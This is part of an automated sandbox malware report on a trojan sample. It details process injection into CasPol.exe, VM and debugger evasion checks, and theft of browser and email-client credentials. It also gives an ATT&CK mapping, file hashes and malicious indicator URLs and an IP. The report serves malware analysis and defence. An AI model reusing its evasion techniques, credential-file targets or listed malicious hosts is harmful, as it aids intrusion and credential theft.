          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\6culQoI97a.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Source: 6culQoI97a.exe, 00000002.00000002.1203249010.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEPGZ
          Source: 6culQoI97a.exe, 00000002.00000002.1203507076.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6664Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6664Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8632Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC81AD rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9871
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_00406448 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_004027A1 FindFirstFileA,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Users\user\Desktop\6culQoI97a.exeSystem information queried: ModuleInformation
          Source: C:\Users\user\Desktop\6culQoI97a.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\6culQoI97a.exeAPI call chain: ExitProcess graph end node
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000009.00000002.5787444252.00000000013C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000009.00000002.5785252784.000000000135B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: 6culQoI97a.exe, 00000002.00000002.1203249010.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exepGz
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: 6culQoI97a.exe, 00000002.00000002.1203507076.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: 6culQoI97a.exe, 00000002.00000002.1204307572.0000000003049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_73DD1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC81AD rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC6E46 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EC6E47 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECBA0D mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECBA0D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECBBF7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB7CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECA44C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB84D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB80E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EDFDE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB960 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECB17E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EE1D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02ECC936 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\6culQoI97a.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_02EDFE03 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\6culQoI97a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: FB0000
          Source: C:\Users\user\Desktop\6culQoI97a.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\6culQoI97a.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          11
          Masquerading
          1
          OS Credential Dumping
          331
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API
          Boot or Logon Initialization Scripts111
          Process Injection
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth1
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading
          241
          Virtualization/Sandbox Evasion
          Security Account Manager241
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Data from Local System
          Automated Exfiltration1
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Access Token Manipulation
          NTDS1
          Application Window Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer11
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script111
          Process Injection
          LSA Secrets2
          File and Directory Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Obfuscated Files or Information
          Cached Domain Credentials117
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          6culQoI97a.exe73%ReversingLabsWin32.Trojan.Woreflint
          6culQoI97a.exe57%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nspCBC.tmp\System.dll0%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          2.0.6culQoI97a.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.2.6culQoI97a.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          ftp://ftp.gettoner.com.mx/droid100%Avira URL Cloudmalware
          http://195.178.120.24/mhpgXW188.chm100%Avira URL Cloudmalware
          http://NwSpLV.com0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://195.178.120.24/mhpgXW188.chmfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://127.0.0.1:HTTP/1.1CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://DynDns.comDynDNSCasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://NwSpLV.comCasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_Error6culQoI97a.exefalse
            high
            http://nsis.sf.net/NSIS_ErrorError6culQoI97a.exefalse
              high
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              ftp://ftp.gettoner.com.mx/droidCasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              195.178.120.24
              unknownunknown
              31564HEXAGLOBE-ASFRfalse
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:755473
              Start date and time:2022-11-28 19:15:02 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 13m 33s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:6culQoI97a.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Run name:Suspected Instruction Hammering
              Number of analysed new started processes analysed:30
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@4/4@0/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 24.5% (good quality ratio 24%)
              • Quality average: 88.3%
              • Quality standard deviation: 22.1%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 40.77.2.164
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              No simulations
              No context
              No context
              No context
              No context
              No context
              Process:C:\Users\user\Desktop\6culQoI97a.exe
              File Type:data
              Category:dropped
              Size (bytes):151484
              Entropy (8bit):6.722739524237379
              Encrypted:false
              SSDEEP:3072:i/XcPN2AMaEryngg6xwigaQTpHJVoBMQ/fV:ikUUhnfJrZzcMQ/fV
              MD5:7D35914613D5AE2EE21358270112B5F2
              SHA1:ED7CBBBBC35EBCA9F221B1E22927BF2845B54807
              SHA-256:DF9AA833D7E0B7455D5112DF644234B735D4F8C4E2A1527148E655DE16DA4BA3
              SHA-512:29F422C4B45EE72141D040EA7682A6D4C90858EA42F2FF461A6301B90195F5DF6F79B5F364B55D61A327EE1E5BAAE26F317E42B3965EDBD1ED42EF7F4FCB7793
              Malicious:false
              Reputation:low
              Preview:..zx'il...Y........W.7...HF..$K..B.+.z.$i.z.M6.O..0wG;~Fm.....!gJn..M;&..-Lm.S<......B..*Q.N.).C....x.h`.[o....*...IL@..^..e(...H....F<U...,.M8m>.l..F...o...W......4....l<h..f....yK...a..n.....LM.*.U..S7]..b..V..;.W-..pL.k..........w...U...9F..;y.....H..jc......u....\.V...%.O..r.a3=&.mE9.........G..c..Y.&.....|...*..X.~.`...=...e6..W.........w..7..B.U.".m....Q;T..D..A[...E.{...[..f..".....D#a...........sd...l,..t....)tU.[ .u\.M...{3UP...~c_u.......dK..=.1.?..}8.TP.+P.z.H{.>'..2%a...}.f.e|3C.....R(...Q.`F~..N}Q]H.!.....+.....Y.G...d.\U."......Z....../c..%.t.....@8...D.1.S....N........q.......Kq..........................................................................f.................l.d)f................................................................................................................f.e....f.b..i.LZ.....................................................................................................f!............H...6qqqqqqqqqqqqqqqqqqqqqqq
              Process:C:\Users\user\Desktop\6culQoI97a.exe
              File Type:ASCII text, with very long lines (42820), with no line terminators
              Category:dropped
              Size (bytes):42820
              Entropy (8bit):3.999720795205128
              Encrypted:false
              SSDEEP:768:Y8gLgZjz0mqZY9XVZ3z0Aqa2ogrBpnu2L9l6+EfD5u6IZ46hj0HJPn1W4:LgLgNuYBrA75oIpu2Rl6+20v46QF17
              MD5:63EE366B70BC4507D462A94DD9C637BA
              SHA1:E0E3D34620C83C47F0590BD059AE2066D7F26FE7
              SHA-256:D032E1E9FA29373C0D811D0ED484D69F64DF02C0353DC2B7B4F2D08C44094F8A
              SHA-512:096C8D578842BE10D2B5D88DF5B130EE3D352190158CBF893DC2AC106D2DF6A91BFA17A92F5F48D3EC952A83DB785A05076AC340015832E5EF4D08D5E584EF00
              Malicious:false
              Reputation:low
